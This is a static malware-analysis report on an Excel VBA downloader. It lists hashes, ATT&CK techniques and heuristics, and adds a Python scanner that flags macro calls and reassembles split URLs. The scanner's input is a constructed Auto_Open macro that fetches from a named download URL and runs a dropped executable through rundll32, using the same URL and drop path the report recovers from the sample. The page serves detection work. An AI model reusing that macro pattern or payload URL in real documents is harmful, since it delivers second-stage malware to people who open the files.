Xls.Downloader.b83ac4c497e169b5-9980307-0 — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 02936f6a010516de…

MALICIOUS

Office (OLE) / .XLS

Size: 63.5 KB
Created: 2022-11-10 07:57:43
Authoring application: Microsoft Excel
First seen: 2022-11-10
MD5: 21a0f506b9f80acb4d0b8eee78ec809a
SHA-1: eed781c685bfe69793a2c5675996d33b5f329915
SHA-256: 02936f6a010516dec9a7358480da9a307fd2c7ceb1eb3eb50603fad3270376a8
Risk Score: 188

Malware Insights

Xls.Downloader.b83ac4c497e169b5-9980307-0 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1105 Ingress Tool Transfer

The sample is an Excel workbook carrying VBA macros. The macro code calls CreateObject() to obtain the COM objects used to download and write a second-stage payload to disk, and Shell() to run the resulting command line. The download URL is assembled at runtime from fragments; the reconstructed value is 'http://1y2ou4bi60ci.com/c12o-m'. The fetched payload is written to 'C:\9cal9c.exe' and then launched through 'rundll32.exe'. The Environ() call noted below indicates the macro also reads environment variables, which is commonly used to resolve paths or to fingerprint the host before acting.
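The two analysis steps that matter for a downloader like this are (a) firing the OLE_VBA_* heuristics over the decoded macro source and (b) folding the split string literals so the URL and drop path can be read out of them. The Python below is an added example written for this page, not the analysis platform's or ClamAV's code. The VBA it scans is a constructed stand-in that imitates the behaviour described above and reuses only the URL and path quoted in the report; it is not the macro carved from the sample, and the rule patterns are my own approximation of the named heuristics.

```python
import re

# Constructed sample VBA that imitates the behaviour the report describes.
# It is NOT the macro extracted from the sample; it reuses the report's URL
# and drop path only so the concatenation-folding step has realistic input.
SAMPLE_VBA = r'''
Attribute VB_Name = "Module1"
Sub Auto_Open()
    Dim u As String, p As String
    ' splitting literals with & defeats a naive grep for http://
    u = "http://1y2ou4" & "bi60ci.com" & "/c12o-m"
    p = "C:\" & "9cal9c" & ".exe"
    Set h = CreateObject("MSXML2.XMLHTTP")
    Set s = CreateObject("ADODB.Stream")
    t = Environ("TEMP")
    Shell "rundll32.exe " & p, vbHide
End Sub
'''

# (rule id, severity, pattern) modelled on the report's OLE_VBA_* heuristics
HEURISTICS = [
    ("OLE_VBA_SHELL", "critical", re.compile(r"\bShell\b", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
]

# A run of two or more string literals joined by &, e.g. "a" & "b" & "c"
_CONCAT = re.compile(r'"([^"\r\n]*)"(?:\s*&\s*"([^"\r\n]*)")+')
_URL = re.compile(r'https?://[^\s"\'<>]+', re.I)
_PATH = re.compile(r'[A-Za-z]:\\[^\s"\'<>]+')


def strip_comments(src: str) -> str:
    """Drop VBA ' comments that begin outside a string literal, per line."""
    out = []
    for line in src.splitlines():
        in_str = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_str = not in_str
            elif ch == "'" and not in_str:
                line = line[:i]
                break
        out.append(line)
    return "\n".join(out)


def fold_concats(src: str) -> str:
    """Replace each run of &-joined literals with the single joined literal."""
    def join(m):
        parts = re.findall(r'"([^"\r\n]*)"', m.group(0))
        return '"' + "".join(parts) + '"'
    return _CONCAT.sub(join, src)


def scan_vba(src: str) -> dict:
    """Return fired heuristics plus URLs and drop paths recovered after folding."""
    code = strip_comments(src)
    fired = [(rid, sev) for rid, sev, pat in HEURISTICS if pat.search(code)]
    if code.strip():
        fired.append(("OLE_VBA_MACROS", "medium"))
    folded = fold_concats(code)
    return {
        "heuristics": fired,
        "urls": sorted(set(_URL.findall(folded))),
        "paths": sorted(set(_PATH.findall(folded))),
    }


if __name__ == "__main__":
    result = scan_vba(SAMPLE_VBA)
    for rid, sev in result["heuristics"]:
        print(f"{sev:8} {rid}")
    print("urls: ", result["urls"])
    print("paths:", result["paths"])
```

Comments are stripped before matching so a benign `' Shell` in a remark does not fire the critical rule, and folding runs only over adjacent literals, so a URL built from variables or Chr() calls would still need the emulation step that olevba's deobfuscation performs.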

Heuristics (5)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Downloader.b83ac4c497e169b5-9980307-0
  • OLE_VBA_CREATEOBJ (high): CreateObject() call
  • OLE_VBA_MACROS (medium): Document contains VBA macro code
  • OLE_VBA_ENVIRON (low): Environ() call (environment variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    SHA-256: 027e1662a91ca9e45724cd5eba018a07f94311c2655f7f5e5f4fe6e85aa3f3e8
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 3119 bytes